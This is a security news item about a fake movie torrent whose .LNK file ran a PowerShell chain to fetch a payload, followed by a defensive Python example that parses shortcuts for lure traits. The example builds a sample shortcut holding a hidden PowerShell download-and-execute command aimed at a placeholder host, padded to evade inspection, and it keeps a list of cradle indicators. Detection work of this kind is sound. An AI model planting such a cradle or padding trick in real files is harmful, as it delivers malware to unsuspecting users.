Brother
An information security specialist known under the pseudonym 0xffff0800 discovered on The Pirate Bay torrent tracker a distribution of the movie "The Girl in the Spider's Web" where, instead of the movie, the user downloaded a suspicious .LNK file containing a PowerShell command. Interestingly, at the time the fake "film" was discovered, 2,375 people were seeding it.
Immediately after the fake movie is launched, a PowerShell command executes which runs a chain of further commands, ultimately leading to a payload being dropped in %AppData%. In essence, PowerShell contacts the attackers' C&C server, which redirects it to Pastebin for further instructions.
After checking the file on VirusTotal, the specialist noticed that not all security solutions detect suspicious activity in it. The researcher also suggested that the file may be linked to the well-known hacking group CozyBear (aka APT29, CozyDuke, CozyCar, Grizzly Bear), which has already used a similar technique in its attacks.
0xffff0800 disagrees with FireEye expert Nick Carr, who notes that malicious .LNK files are used very often, especially to deceive users of "pirate" sites, and not only by the CozyBear group.
0xffff0800 published the .LNK file publicly so that other specialists could study the find. BleepingComputer founder Lawrence Abrams discovered that running the .LNK file does more than just inject ads into Google's home page, as was initially assumed.
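The shortcut-launches-PowerShell chain described in the post, seen from the defender's side. This is an added example, not the post's own code and not the sample 0xffff0800 published: it builds two shortcut files in memory from the MS-SHLLINK layout (header, StringData, terminal block), parses the target and command-line arguments back out, and flags the traits a hidden PowerShell download cradle leaves in the file. The paths, the example.invalid URL and the whitespace padding are constructed for the demonstration; the indicator list is an assumption about what to look for, not a signature of the actual sample.

```python
"""Inspect Windows .LNK shortcuts for the hidden-PowerShell lure pattern.

Added example, not code from the post or from the published sample.  Two
shortcuts are constructed in memory from the MS-SHLLINK layout so the script
runs offline; real files can be passed to parse_lnk() as bytes.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand: start minimized, never take focus
# StringData blocks appear in this fixed order, each only if its flag is set
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# Assumed download-cradle indicators; tune these to your own environment
INDICATORS = [r"-e(nc|ncodedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"-nop\b",
              r"bypass", r"\biex\b", r"invoke-expression",
              r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
              r"appdata", r"pastebin"]


def build_lnk(relative_path, working_dir, arguments, show_command=1):
    """Build a minimal Unicode shortcut: header + StringData + TerminalBlock."""
    flags = HAS_REL_PATH | HAS_WORKING_DIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body + b"\x00\x00\x00\x00"


def parse_lnk(data):
    """Return ShowCommand and the StringData fields of a shortcut."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:    # IDListSize (2 bytes) followed by the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            fields[name] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # characters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields


def assess_lnk(fields):
    """List the reasons a parsed shortcut looks like a script-launching lure."""
    target = (fields["relative_path"] or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = fields["arguments"] or ""
    reasons = []
    if target in INTERPRETERS:
        reasons.append(f"target is a script interpreter: {target}")
    reasons += [f"arguments match /{p}/" for p in INDICATORS if re.search(p, args, re.I)]
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window is started minimized and unfocused (hidden console)")
    if len(args) > 260:
        reasons.append("arguments longer than 260 chars (truncated in Explorer's Properties dialog)")
    return reasons


# Constructed samples; example.invalid is a reserved, non-resolving name.
CRADLE = ("-NoP -W Hidden -Exec Bypass -C \"IEX (New-Object Net.WebClient)"
          ".DownloadString('http://example.invalid/stage1')\"")
LURE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     r"C:\Windows\System32", CRADLE + " " * 300, SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Windows\System32", "")

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        reasons = assess_lnk(parse_lnk(blob))
        print(f"{label}: {'SUSPICIOUS' if reasons else 'clean'}")
        for r in reasons:
            print("  -", r)
```

The parser reads only the header and StringData, which is where the launched command lives; the IDList and LinkInfo blocks are skipped by their own size fields. The Explorer dialog that a victim might check shows the Target box truncated, so a long run of padding after the real command is treated as a signal in its own right rather than as noise.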